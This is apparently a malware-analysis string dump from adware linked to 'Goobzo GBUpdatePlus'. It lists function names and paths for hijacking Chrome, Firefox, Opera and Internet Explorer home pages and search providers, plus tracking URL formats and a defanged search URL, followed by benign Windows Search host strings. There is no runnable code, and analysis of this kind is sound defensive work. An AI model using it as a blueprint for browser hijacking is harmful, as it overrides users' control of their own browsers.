Pipe (0x%X) read problems. %%s

NTDLL.DLL

NTDLL.DLL

Windows NT 6.1

Windows NT 6.1

%s?e=%s

%s?e=%s

zvl=%s&

zvl=%s&

%s?prd=%s&aff=%s&ver=%s&rnd=%d&usid=%s&pixGuid=%s

%s?prd=%s&aff=%s&ver=%s&rnd=%d&usid=%s&pixGuid=%s

&tss=%d&action=%s&actionparam=%s

&tss=%d&action=%s&actionparam=%s

[Utils::PipedProcess::CreateOutputHandles]

[Utils::PipedProcess::CreateOutputHandles]

[Utils::PipedProcess::CreateInputHandles]

[Utils::PipedProcess::CreateInputHandles]

[Utils::PipedProcess::SpawnProcess]

[Utils::PipedProcess::SpawnProcess]

Utils::PipedProcess::CreateOutputHandles

Utils::PipedProcess::CreateOutputHandles

Utils::PipedProcess::CreateInputHandles

Utils::PipedProcess::CreateInputHandles

Utils::PipedProcess::SpawnProcess

Utils::PipedProcess::SpawnProcess

[Utils::PipedProcess::Start]

[Utils::PipedProcess::Start]

[Utils::PipedProcess::Wait]

[Utils::PipedProcess::Wait]

Utils::PipedProcess::WriteProc

Utils::PipedProcess::WriteProc

[Utils::PipedProcess::WriteData]

[Utils::PipedProcess::WriteData]

Utils::PipedProcess::ReadProc

Utils::PipedProcess::ReadProc

[Utils::PipedProcess::ReadData]

[Utils::PipedProcess::ReadData]

.cache

.cache

ntdll.dll

ntdll.dll

Could not open memory object. Object name: %s. %%s

Could not open memory object. Object name: %s. %%s

Could not create memory object. Object name: %s. %%s

Could not create memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. Size: %u. %%s

Could not map memory object. Object name: %s. Size: %u. %%s

Could not map memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. %%s

Could not create sync object for memory. Object name: %s. %%s

Could not create sync object for memory. Object name: %s. %%s

pathToSignedProductExe

pathToSignedProductExe

SELECT * FROM Win32_OperatingSystem

SELECT * FROM Win32_OperatingSystem

[BrowserHistory::GetPropertyReport]

[BrowserHistory::GetPropertyReport]

Found URL:

Found URL:

X-hX-hX-XX-XXXXXX

X-hX-hX-XX-XXXXXX

IExecAction::put_Path

IExecAction::put_Path

IAction::QueryInterface

IAction::QueryInterface

IExecAction::put_Arguments

IExecAction::put_Arguments

IExecAction::put_WorkingDirectory

IExecAction::put_WorkingDirectory

http\shell\open\command

http\shell\open\command

Software\Microsoft\Windows\CurrentVersion\App Paths

Software\Microsoft\Windows\CurrentVersion\App Paths

[Utils::SoftwareInfo::GetHttpOpenHandler]

[Utils::SoftwareInfo::GetHttpOpenHandler]

Utils::Registry::OpenKeyW

Utils::Registry::OpenKeyW

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Could not create pipe. %%s

Could not create pipe. %%s

Could not allocate IPC memory. Requires size: %u

Could not allocate IPC memory. Requires size: %u

Event error. %%s

Event error. %%s

Could not create pipe event. %%s

Could not create pipe event. %%s

Pipe connecting error. %%s

Pipe connecting error. %%s

Error code: %u ('%s')

Error code: %u ('%s')

Not enough memory. Size: %s (%s)

Not enough memory. Size: %s (%s)

Could not create IPC event. %%s

Could not create IPC event. %%s

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

Content-Type: multipart/form-data; boundary=%s

XXX

XXX

HTTP/1.1

HTTP/1.1

Content-Disposition: form-data; name="%s"

Content-Disposition: form-data; name="%s"

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

HTTP/1.0

HTTP/1.0

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}

[SynchronousPipe::Read]

[SynchronousPipe::Read]

[SynchronousPipe::Write]

[SynchronousPipe::Write]

CChromeExtension::GetFileListInExtenstion

CChromeExtension::GetFileListInExtenstion

__MSG_

__MSG_

messages.json

messages.json

manifest.json

manifest.json

CHROME.EXE

CHROME.EXE

[Chrome::BrowserInfo::Query]

[Chrome::BrowserInfo::Query]

WebData

WebData

SHELL32.DLL

SHELL32.DLL

e\Application\chrome.exe

e\Application\chrome.exe

Google\Chrome

Google\Chrome

\resources.pak

\resources.pak

\Google\Chrome\Application\chrome.exe

\Google\Chrome\Application\chrome.exe

\Google\Chrome\Application\

\Google\Chrome\Application\

\Web Data

\Web Data

[SQLite::Implementation::AddProvider]

[SQLite::Implementation::AddProvider]

[SQLite::Implementation::GetProviderById]

[SQLite::Implementation::GetProviderById]

[SQLite::Implementation::GetFirstProviderId]

[SQLite::Implementation::GetFirstProviderId]

[SQLite::Implementation::GetProviderByKeyword]

[SQLite::Implementation::GetProviderByKeyword]

[SQLite::Implementation::GetProviderId]

[SQLite::Implementation::GetProviderId]

chrome-extension://

chrome-extension://

13050095043000000

13050095043000000

hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}

hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}

4BB42133-5533-4A0C-BF72-F1B8C8776A11

4BB42133-5533-4A0C-BF72-F1B8C8776A11

Checking

Checking

[Injection::Snapshot::Chrome::Settings::Dump]

[Injection::Snapshot::Chrome::Settings::Dump]

[Injection::Snapshot::Firefox::Settings::Dump]

[Injection::Snapshot::Firefox::Settings::Dump]

[Monitor::RestoreData::Controller::Build]

[Monitor::RestoreData::Controller::Build]

[Monitor::RestoreData::Controller::Build]

[Monitor::RestoreData::Controller::Build]

[Injection::Snapshot::Builder::BuildSettings]

[Injection::Snapshot::Builder::BuildSettings]

[Injection::Snapshot::Builder::BuildSettings]

[Injection::Snapshot::Builder::BuildSettings]

Injection::Snapshot::Parser::Parse

Injection::Snapshot::Parser::Parse

new

new

Injection::Snapshot::Parser::Parse

Injection::Snapshot::Parser::Parse

new

new

[Injection::Snapshot::Parser::Parse]

[Injection::Snapshot::Parser::Parse]

ReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

[Injection::Snapshot::Parser::Parse]

[Injection::Snapshot::Parser::Parse]

Chrome::BrowserSettings::Create

Chrome::BrowserSettings::Create

[Injection::Snapshot::Controller::IsChromeInstalled]

[Injection::Snapshot::Controller::IsChromeInstalled]

Firefox::BrowserSettings::Create

Firefox::BrowserSettings::Create

[Injection::Snapshot::Controller::IsFirefoxInstalled]

[Injection::Snapshot::Controller::IsFirefoxInstalled]

Firefox::BrowserSettings::RestoreState

Firefox::BrowserSettings::RestoreState

Chrome::BrowserSettings::RestoreState

Chrome::BrowserSettings::RestoreState

Argument.SystemConfig:

Argument.SystemConfig:

Argument.Config::User:

Argument.Config::User:

Argument.Config::General:

Argument.Config::General:

Chrome::BrowserSettings::PropagateState

Chrome::BrowserSettings::PropagateState

Firefox::BrowserSettings::PropagateState

Firefox::BrowserSettings::PropagateState

Argument.UserSid:

Argument.UserSid:

WatchmanKey::Users::SaveRestoreData

WatchmanKey::Users::SaveRestoreData

[WatchmanKey::GetEncryptionKey]

[WatchmanKey::GetEncryptionKey]

MachineKey::Generate

MachineKey::Generate

MachineKey::Create

MachineKey::Create

[WatchmanKey::LoadEncodedData]

[WatchmanKey::LoadEncodedData]

[WatchmanKey::CleanupKey]

[WatchmanKey::CleanupKey]

WatchmanKey::GetEncryptionKey

WatchmanKey::GetEncryptionKey

[WatchmanKey::SaveEncodedData]

[WatchmanKey::SaveEncodedData]

WatchmanKey::System::Open

WatchmanKey::System::Open

[WatchmanKey::System::LoadGeneralConfig]

[WatchmanKey::System::LoadGeneralConfig]

[WatchmanKey::System::SaveGeneralConfig]

[WatchmanKey::System::SaveGeneralConfig]

WatchmanKey::LoadEncodedData

WatchmanKey::LoadEncodedData

WatchmanKey::SaveEncodedData

WatchmanKey::SaveEncodedData

WatchmanKey::System::Ensure

WatchmanKey::System::Ensure

[WatchmanKey::System::SaveSystemConfig]

[WatchmanKey::System::SaveSystemConfig]

[WatchmanKey::System::LoadSystemConfig]

[WatchmanKey::System::LoadSystemConfig]

WatchmanKey::EnsureKey

WatchmanKey::EnsureKey

[WatchmanKey::Users::Ensure]

[WatchmanKey::Users::Ensure]

WatchmanKey::OpenKey

WatchmanKey::OpenKey

[WatchmanKey::Users::Open]

[WatchmanKey::Users::Open]

[WatchmanKey::Users::LoadConfiguration]

[WatchmanKey::Users::LoadConfiguration]

[WatchmanKey::Users::SaveConfiguration]

[WatchmanKey::Users::SaveConfiguration]

WatchmanKey::Users::Ensure

WatchmanKey::Users::Ensure

[WatchmanKey::Users::LoadRestoreData]

[WatchmanKey::Users::LoadRestoreData]

[WatchmanKey::Updater::SetLastTime]

[WatchmanKey::Updater::SetLastTime]

[WatchmanKey::Updater::GetBlackListHash]

[WatchmanKey::Updater::GetBlackListHash]

[WatchmanKey::Updater::SetBlackListHash]

[WatchmanKey::Updater::SetBlackListHash]

[WatchmanKey::Reporter::SetLastTime]

[WatchmanKey::Reporter::SetLastTime]

[WatchmanKey::Reporter::GetLastTime]

[WatchmanKey::Reporter::GetLastTime]

[WatchmanKey::TimeBomb::Uninstall]

[WatchmanKey::TimeBomb::Uninstall]

WatchmanKey::SystemKey::Open

WatchmanKey::SystemKey::Open

{CFBFAE00-17A6-11D0-99CB-00C04FD64497}

{CFBFAE00-17A6-11D0-99CB-00C04FD64497}

{7F4EFF06-7032-458e-AE16-1C1D8255C28A}

{7F4EFF06-7032-458e-AE16-1C1D8255C28A}

smod.xml

smod.xml

SearchModulePlus.crx

SearchModulePlus.crx

DATAMNGR.DLL

DATAMNGR.DLL

IEBHO.DLL

IEBHO.DLL

VC32.DLL

VC32.DLL

[Config::General::UrlSet::Copy]

[Config::General::UrlSet::Copy]

[Config::General::Chrome::Settings::Dump]

[Config::General::Chrome::Settings::Dump]

[Config::General::Chrome::ValueSet::Copy]

[Config::General::Chrome::ValueSet::Copy]

[Config::General::Chrome::Settings::Copy]

[Config::General::Chrome::Settings::Copy]

[Config::General::Firefox::Settings::Copy]

[Config::General::Firefox::Settings::Copy]

[Config::General::Firefox::Settings::Dump]

[Config::General::Firefox::Settings::Dump]

[Config::General::Opera::Settings::Dump]

[Config::General::Opera::Settings::Dump]

[Config::General::Firefox::ValueSet::Copy]

[Config::General::Firefox::ValueSet::Copy]

[Config::General::Opera::Settings::Copy]

[Config::General::Opera::Settings::Copy]

Config::General::Parser::ParseUrlSet

Config::General::Parser::ParseUrlSet

Config::General::Parser::ParseFirefoxSettings

Config::General::Parser::ParseFirefoxSettings

Config::General::Parser::ParseChromeSettings

Config::General::Parser::ParseChromeSettings

Config::General::Parser::ParseOperaSettings

Config::General::Parser::ParseOperaSettings

ReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

eReadStringNode

eReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

[Config::General::Parser::ParseChromeSettings]

[Config::General::Parser::ParseChromeSettings]

Config::General::Parser::ParseChromeValueSets

Config::General::Parser::ParseChromeValueSets

MissedElement

MissedElement

ReadStringNode

ReadStringNode

[Config::General::Parser::ParseChromeValueSets]

[Config::General::Parser::ParseChromeValueSets]

ReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

[Config::General::Parser::ParseFirefoxSettings]

[Config::General::Parser::ParseFirefoxSettings]

ReadStringNode

ReadStringNode

Config::General::Parser::ParseFirefoxValueSets

Config::General::Parser::ParseFirefoxValueSets

MissedElement

MissedElement

ReadOptionalStringNode

ReadOptionalStringNode

[Config::General::Parser::ParseFirefoxValueSets]

[Config::General::Parser::ParseFirefoxValueSets]

ReadOptionalStringNode

ReadOptionalStringNode

lReadOptionalStringNode

lReadOptionalStringNode

MissedElement

MissedElement

[Config::General::Parser::ParseUrlSet]

[Config::General::Parser::ParseUrlSet]

ReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

yReadStringNode

yReadStringNode

ReadStringNode

ReadStringNode

[Config::General::Parser::ParseOperaSettings]

[Config::General::Parser::ParseOperaSettings]

ReadStringNode

ReadStringNode

MissedElement

MissedElement

ReadStringNode

ReadStringNode

[Config::General::Builder::Build]

[Config::General::Builder::Build]

[Config::General::Builder::Build]

[Config::General::Builder::Build]

[Config::General::Builder::Build]

[Config::General::Builder::Build]

We couldn't find the URL Set section... probably an old configuration!

We couldn't find the URL Set section... probably an old configuration!

WatchmanKey::System::LoadGeneralConfig

WatchmanKey::System::LoadGeneralConfig

WatchmanKey::System::SaveGeneralConfig

WatchmanKey::System::SaveGeneralConfig

2.1.0.7

2.1.0.7

2.0.0.0

2.0.0.0

ReadOptionalStringNode

ReadOptionalStringNode

ReadStringNode

ReadStringNode

ReadStringNode

ReadStringNode

ReadBooleanNode

ReadBooleanNode

ReadBooleanNode

ReadBooleanNode

Could not find URL Set in configuration. Probably older configuration.

Could not find URL Set in configuration. Probably older configuration.

ReadBooleanNode

ReadBooleanNode

WatchmanKey::System::LoadSystemConfig

WatchmanKey::System::LoadSystemConfig

WatchmanKey::System::SaveSystemConfig

WatchmanKey::System::SaveSystemConfig

[Config::User::Chrome::Settings::Copy]

[Config::User::Chrome::Settings::Copy]

[Config::User::Firefox::Settings::Copy]

[Config::User::Firefox::Settings::Copy]

Config::User::Parser::ParseChromeSettings

Config::User::Parser::ParseChromeSettings

Config::User::Parser::ParseFirefoxSettings

Config::User::Parser::ParseFirefoxSettings

[Config::User::Parser::ParseChromeSettings]

[Config::User::Parser::ParseChromeSettings]

[Config::User::Parser::ParseFirefoxSettings]

[Config::User::Parser::ParseFirefoxSettings]

[Config::User::Builder::BuildFirefoxSettings]

[Config::User::Builder::BuildFirefoxSettings]

[Config::User::Builder::BuildChromeSettings]

[Config::User::Builder::BuildChromeSettings]

WatchmanKey::User::LoadConfiguration

WatchmanKey::User::LoadConfiguration

WatchmanKey::User::SaveConfiguration

WatchmanKey::User::SaveConfiguration

Mozilla\Firefox\

Mozilla\Firefox\

profiles.ini

profiles.ini

prefs.js

prefs.js

[Firefox::InstallInfo::ReadProfiles]

[Firefox::InstallInfo::ReadProfiles]

[Firefox::InstallInfo::QueryProfiles]

[Firefox::InstallInfo::QueryProfiles]

[Firefox::InstallInfo::ParseProfiles]

[Firefox::InstallInfo::ParseProfiles]

Firefox::InstallInfo::ReadProfiles

Firefox::InstallInfo::ReadProfiles

Firefox::InstallInfo::ParseProfiles

Firefox::InstallInfo::ParseProfiles

[Firefox::InstallInfo::Query]

[Firefox::InstallInfo::Query]

No profiles found! Maybe - first start of Firefox?

No profiles found! Maybe - first start of Firefox?

[Firefox::BrowserSettings::MakeSnapshot]

[Firefox::BrowserSettings::MakeSnapshot]

[Firefox::BrowserSettings::RestoreState]

[Firefox::BrowserSettings::RestoreState]

[Firefox::BrowserSettings::PropagateState]

[Firefox::BrowserSettings::PropagateState]

Software\Microsoft\Windows\CurrentVersion\Ext\Settings

Software\Microsoft\Windows\CurrentVersion\Ext\Settings

Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

Software\Microsoft\Internet Explorer\AboutURLs

Software\Microsoft\Internet Explorer\AboutURLs

TopResultURLFallback

TopResultURLFallback

SuggestionURL

SuggestionURL

FaviconURL

FaviconURL

IEXPLORE.EXE

IEXPLORE.EXE

Failed to call enum URL's. Error:

Failed to call enum URL's. Error:

Software\Microsoft\Internet Explorer\URLSearchHooks

Software\Microsoft\Internet Explorer\URLSearchHooks

[Explorer::BrowserSettings::SetMainKeyValues]

[Explorer::BrowserSettings::SetMainKeyValues]

[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]

[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]

[Explorer::BrowserSettings::SetSearchScopeKeyValues]

[Explorer::BrowserSettings::SetSearchScopeKeyValues]

[Explorer::BrowserSettings::SetAboutURLsKeyValues]

[Explorer::BrowserSettings::SetAboutURLsKeyValues]

Result.SearchScope:

Result.SearchScope:

Argument.SearchScopeToSearch:

Argument.SearchScopeToSearch:

Argument.Parent:

Argument.Parent:

[Explorer::BrowserSettings::DeleteKey]

[Explorer::BrowserSettings::DeleteKey]

Argument.Subkey:

Argument.Subkey:

VirtualSpeedbitSearchScopeKey::EnsureKeyW

VirtualSpeedbitSearchScopeKey::EnsureKeyW

Key deleted:

Key deleted:

TopResultURL

TopResultURL

FaviconURLFallback

FaviconURLFallback

SuggestionsURL

SuggestionsURL

SuggestionsURLFallback

SuggestionsURLFallback

\Opera\launcher.exe

\Opera\launcher.exe

Opera Software\Opera Stable\

Opera Software\Opera Stable\

\Opera\

\Opera\

\opera.pak

\opera.pak

Web Data

Web Data

\resources\default_partner_content.json

\resources\default_partner_content.json

KERNELBASE.DLL

KERNELBASE.DLL

Chrome::InstallInfo::Get

Chrome::InstallInfo::Get

[Chrome::BrowserSettings::OpenConfigFiles]

[Chrome::BrowserSettings::OpenConfigFiles]

SQLite::WebDataDB::Create

SQLite::WebDataDB::Create

Argument.HomePageUrl:

Argument.HomePageUrl:

[Chrome::BrowserSettings::SetHomePagePreferences]

[Chrome::BrowserSettings::SetHomePagePreferences]

[Chrome::BrowserSettings::SetDefaultProviderPreferences]

[Chrome::BrowserSettings::SetDefaultProviderPreferences]

Argument.HomePageIsNewTabPage:

Argument.HomePageIsNewTabPage:

Argument.DefaultProviderKeyWord:

Argument.DefaultProviderKeyWord:

Argument.DefaultProviderId:

Argument.DefaultProviderId:

Argument.DefaultProviderEncoding:

Argument.DefaultProviderEncoding:

Argument.DefaultProviderName:

Argument.DefaultProviderName:

Argument.DefaultProviderIconUrl:

Argument.DefaultProviderIconUrl:

Argument.DefaultProviderSearchUrl:

Argument.DefaultProviderSearchUrl:

[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]

[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]

Argument.DefaultProviderSuggestUrl:

Argument.DefaultProviderSuggestUrl:

Argument.UrlsToRestoreOnStartup:

Argument.UrlsToRestoreOnStartup:

Argument.RestoreOnStartup:

Argument.RestoreOnStartup:

Argument.KeywordToSearch:

Argument.KeywordToSearch:

[Chrome::BrowserSettings::GetSearchProviderId]

[Chrome::BrowserSettings::GetSearchProviderId]

SQLite::WebDataDB::GetProviderById

SQLite::WebDataDB::GetProviderById

SQLite::WebDataDB::GetFirstProviderId

SQLite::WebDataDB::GetFirstProviderId

[Chrome::BrowserSettings::EnsureSearchProvider]

[Chrome::BrowserSettings::EnsureSearchProvider]

Result.ProviderId:

Result.ProviderId:

[Chrome::BrowserSettings::DeleteSearchProvider]

[Chrome::BrowserSettings::DeleteSearchProvider]

SQLite::WebDataDB::Values::Create

SQLite::WebDataDB::Values::Create

[Chrome::BrowserSettings::MakeSnapshot]

[Chrome::BrowserSettings::MakeSnapshot]

[Chrome::BrowserSettings::RestoreState]

[Chrome::BrowserSettings::RestoreState]

Chrome::BrowserSettings::DeleteSearchProvider

Chrome::BrowserSettings::DeleteSearchProvider

Chrome::BrowserSettings::OpenConfigFiles

Chrome::BrowserSettings::OpenConfigFiles

SQLite::WebDataDB::SetDefaultProvider

SQLite::WebDataDB::SetDefaultProvider

[Chrome::BrowserSettings::PropagateState]

[Chrome::BrowserSettings::PropagateState]

Chrome::BrowserSettings::EnsureSearchProvider

Chrome::BrowserSettings::EnsureSearchProvider

%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe

%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe

SearchProtocolHost.exe_3464:

.text

.text

`.data

`.data

.rsrc

.rsrc

@.reloc

@.reloc

ADVAPI32.dll

ADVAPI32.dll

ntdll.DLL

ntdll.DLL

KERNEL32.dll

KERNEL32.dll

msvcrt.dll

msvcrt.dll

USER32.dll

USER32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

TQUERY.DLL

TQUERY.DLL

MSSHooks.dll

MSSHooks.dll

IMM32.dll

IMM32.dll

SHLWAPI.dll

SHLWAPI.dll

SrchCollatorCatalogInfo

SrchCollatorCatalogInfo

SrchDSSLogin

SrchDSSLogin

SrchDSSPortManager

SrchDSSPortManager

SrchPHHttp

SrchPHHttp

SrchIndexerQuery

SrchIndexerQuery

SrchIndexerProperties

SrchIndexerProperties

SrchIndexerPlugin

SrchIndexerPlugin

SrchIndexerClient

SrchIndexerClient

SrchIndexerSchema

SrchIndexerSchema

Msidle.dll

Msidle.dll

Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default

Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default

pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty

pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty

d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx

d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx

d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

RegDeleteKeyW

RegDeleteKeyW

RegDeleteKeyExW

RegDeleteKeyExW

8%uiP

8%uiP

Invalid parameter passed to C runtime function.

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

0xx=

0xx=

%s(%d)

%s(%d)

tid="0x%x"

tid="0x%x"

pid="0x%x"

pid="0x%x"

tagname="%s"

tagname="%s"

tagid="0x%x"

tagid="0x%x"

el="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

time="d/d/d d:d:d.d"

logname="%s"

logname="%s"

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

SHELL32.dll

SHELL32.dll

PROPSYS.dll

PROPSYS.dll

ntdll.dll

ntdll.dll

RegCloseKey

RegCloseKey

RegCreateKeyExW

RegCreateKeyExW

RegOpenKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegQueryInfoKeyW

RegEnumKeyExW

RegEnumKeyExW

ReportEventW

ReportEventW

_amsg_exit

_amsg_exit

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

SearchProtocolHost.pdb

SearchProtocolHost.pdb

2 2(20282|2

2 2(20282|2

4%5S5

4%5S5

Software\Microsoft\Windows Search

Software\Microsoft\Windows Search

https

https

kernel32.dll

kernel32.dll

msTracer.dll

msTracer.dll

msfte.dll

msfte.dll

lX-X-X-XX-XXXXXX

lX-X-X-XX-XXXXXX

SOFTWARE\Microsoft\Windows Search

SOFTWARE\Microsoft\Windows Search

tquery.dll

tquery.dll

%s\%s

%s\%s

HKEY_CLASSES_ROOT

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

HKEY_CURRENT_CONFIG

Windows Search Service

Windows Search Service


0xx%p%S%d


0xx%p%S%d

advapi32.dll

advapi32.dll

WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll

WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll

winhttp.dll

winhttp.dll

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

Software\Microsoft\Windows Search\Tracing\EventThrottleState

%S(%d)

%S(%d)

tagname="%S"

tagname="%S"

logname="%S"

logname="%S"

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s.mui

.\%s\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

%s\%s\%s.mui

Microsoft Windows Search Protocol Host

Microsoft Windows Search Protocol Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchProtocolHost.exe

SearchProtocolHost.exe

Windows

Windows

7.00.7601.17610

7.00.7601.17610

SearchFilterHost.exe_3964:

.text

.text

`.data

`.data

.rsrc

.rsrc

@.reloc

@.reloc

ADVAPI32.dll

ADVAPI32.dll

ntdll.DLL

ntdll.DLL

KERNEL32.dll

KERNEL32.dll

msvcrt.dll

msvcrt.dll

USER32.dll

USER32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

TQUERY.DLL

TQUERY.DLL

IMM32.dll

IMM32.dll

MSSHooks.dll

MSSHooks.dll

mscoree.dll

mscoree.dll

SHLWAPI.dll

SHLWAPI.dll

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

RegDeleteKeyW

RegDeleteKeyW

RegDeleteKeyExW

RegDeleteKeyExW

8%uiP

8%uiP

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

Invalid parameter passed to C runtime function.

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

RegCloseKey

RegCloseKey

RegCreateKeyExW

RegCreateKeyExW

RegOpenKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegQueryInfoKeyW

RegEnumKeyExW

RegEnumKeyExW

ReportEventW

ReportEventW

_amsg_exit

_amsg_exit

SearchFilterHost.pdb

SearchFilterHost.pdb

version="5.1.0.0"

version="5.1.0.0"

name="Microsoft.Windows.Search.MSSFH"

name="Microsoft.Windows.Search.MSSFH"

3 3(30383|3

3 3(30383|3

kernel32.dll

kernel32.dll

Software\Microsoft\Windows Search

Software\Microsoft\Windows Search

SOFTWARE\Microsoft\Windows Search

SOFTWARE\Microsoft\Windows Search

HKEY_CLASSES_ROOT

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

HKEY_CURRENT_CONFIG

Windows Search Service

Windows Search Service

tquery.dll

tquery.dll

advapi32.dll

advapi32.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll


0xx%p%S%d


0xx%p%S%d

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

Software\Microsoft\Windows Search\Tracing\EventThrottleState

0xx=

0xx=

%S(%d)

%S(%d)

tid="0x%x"

tid="0x%x"

pid="0x%x"

pid="0x%x"

tagname="%S"

tagname="%S"

tagid="0x%x"

tagid="0x%x"

el="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

time="d/d/d d:d:d.d"

logname="%S"

logname="%S"

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s.mui

.\%s\%s.mui

.\%s\%s.mui

%s\%s.mui

